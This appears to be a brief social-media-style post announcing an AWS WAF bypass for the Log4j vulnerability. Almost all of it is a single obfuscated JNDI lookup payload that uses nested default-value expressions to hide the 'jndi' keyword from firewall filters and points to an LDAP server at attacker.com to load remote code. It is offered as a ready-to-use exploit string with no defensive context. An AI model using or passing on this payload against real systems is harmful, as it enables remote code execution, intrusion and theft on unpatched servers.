Finally aws waf bypass for log4j

${jnd${123%25ff:-${123%25ff:-i:}}ldap://attacker.com:1389/o}